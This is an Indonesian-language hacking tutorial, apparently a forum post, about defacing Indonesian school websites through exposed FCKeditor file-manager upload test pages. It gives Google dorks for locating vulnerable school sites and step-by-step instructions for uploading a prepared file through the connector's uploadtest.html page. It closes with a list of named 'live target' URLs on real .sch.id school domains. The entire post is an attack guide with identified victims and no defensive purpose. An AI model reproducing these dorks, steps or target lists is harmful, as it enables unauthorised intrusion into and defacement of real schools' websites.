- File txt (bikin di notepad)
Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Exploit:
/editor/filemanager/connectors/test.html
/editor/filemanager/connectors/uploadtest.html
PAKAI SALAH SATU EXPLOITNYA
1. Contoh:
http://blabla.sch.id/html/siswa.php
http://blabla.sch.id/html/alumni.php
http://blabla.sch.id/html/guru.php
2. Ganti jadi:
http://blabla.sch.id/editor/filemanager/connectors/uploadtest.html
3. Ganti ASP Jadi PHP
4. masukan file txt yang sudah disiapkan (open -> upload)
5. Hasilnya: http://xxx.sch.id/userfiles/file/nama-file.txt
Nih, buat yang males nyari langsung aja yang sudah disiapkan:
live target :
http://sdia20.sch.id/simk/atk/attributes/fck/editor/filemanager/connectors/test.html
http://www.e-learning.smpbatikska.sch.id/editor/filemanager/connectors/test.html
http://sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html
http://www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html
Big Thanks to: JokerTeam Child